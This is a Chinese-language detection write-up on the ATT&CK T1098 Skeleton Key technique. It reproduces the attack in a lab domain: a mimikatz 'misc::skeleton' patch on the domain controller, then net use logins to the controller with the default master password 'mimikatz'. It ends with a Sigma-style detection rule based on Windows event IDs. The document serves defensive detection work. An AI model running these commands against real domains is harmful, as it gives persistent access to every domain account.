简述
帐户操作可以帮助攻击者维持在环境中对凭据和某些权限级别的访问。账户操作可能包括修改权限,修改凭据,添加或更改权限组,修改帐户设置或修改执行身份验证等方式。为了创建或操纵帐户,攻击者必须已经对系统或域具有足够的权限。
测试案例
使用万能密码(skeleton key),可以对域内权限进行持久化操作。
检测日志
windows 安全日志
测试复现
步骤1(PC上执行,普通域用户权限)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| C:\Users\xiaomi>dir \\dc.xiaomi.org\c$ 拒绝访问。
C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ "admin.098" /user:xiaomi\administra tor 命令成功完成。
C:\Users\xiaomi>dir \\dc.xiaomi.org\c$ 驱动器 \\dc.xiaomi.org\c$ 中的卷没有标签。 卷的序列号是 50E9-7D0C
\\dc.xiaomi.org\c$ 的目录
2009/07/14 11:20 <DIR> PerfLogs 2020/03/23 15:24 <DIR> Program Files 2020/03/23 15:24 <DIR> Program Files (x86) 2020/03/23 14:47 <DIR> Users 2020/03/23 15:30 <DIR> Windows 0 个文件 0 字节 5 个目录 32,728,838,144 可用字节
C:\Users\xiaomi>net use 会记录新的网络连接。
状态 本地 远程 网络
------------------------------------------------------------------------------- OK \\dc.xiaomi.org\ipc$ Microsoft Windows Network 命令成功完成。
C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ /del /y \\dc.xiaomi.org\ipc$ 已经删除。
C:\Users\xiaomi>net use 会记录新的网络连接。
列表是空的。
|
步骤2(DC上执行,管理员权限)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe "privilege::debug " "misc::skeleton" exit
.#####. mimikatz 2.1.1 (x64) built on Apr 9 2017 23:24:20 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 21 modules * * */
mimikatz(commandline) # privilege::debug Privilege '20' OK
mimikatz(commandline) # misc::skeleton [KDC] data [KDC] struct [KDC] keys patch OK [RC4] functions [RC4] init patch OK [RC4] decrypt patch OK
mimikatz(commandline) # exit Bye!
|
系统提示Skeleton Key已经注入成功。此时,会在域内的所有账户中添加一个Skeleton key,其密码默认为“mimikatz”。接下来可以以域内任何用户的身份,配合该Skeleton Key,进行域内身份授权验证了。
步骤3(PC上执行,普通域用户权限)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| C:\Users\xiaomi>net use \\dc.xiaomi.org\ipc$ "mimikatz" /user:xiaomi\administrat or 命令成功完成。
C:\Users\xiaomi>dir \\dc.xiaomi.org\c$ 驱动器 \\dc.xiaomi.org\c$ 中的卷没有标签。 卷的序列号是 50E9-7D0C
\\dc.xiaomi.org\c$ 的目录
2009/07/14 11:20 <DIR> PerfLogs 2020/03/23 15:24 <DIR> Program Files 2020/03/23 15:24 <DIR> Program Files (x86) 2020/03/23 14:47 <DIR> Users 2020/03/23 15:30 <DIR> Windows 0 个文件 0 字节 5 个目录 32,758,198,272 可用字节
|
测试留痕
windows安全事件ID,多事件关联分析
检测规则/思路
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| title: Windows 万能密码 description: Windows server 2008 R2\win 7 references: https://0xsp.com/ad-attack-or-defense/ad-ttps-list tags: T1098 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection1: EventID: 4673 selection2: EventID: 4611 selection3: EventID: 4688 selection4: EventID: 4689 timeframe: last 5s condition: all of them level: medium
|
参考推荐
MITRE-ATT&CK-T1098:https://attack.mitre.org/techniques/T1098/
域渗透——Skeleton Key – 三好学生:http://www.vuln.cn/6816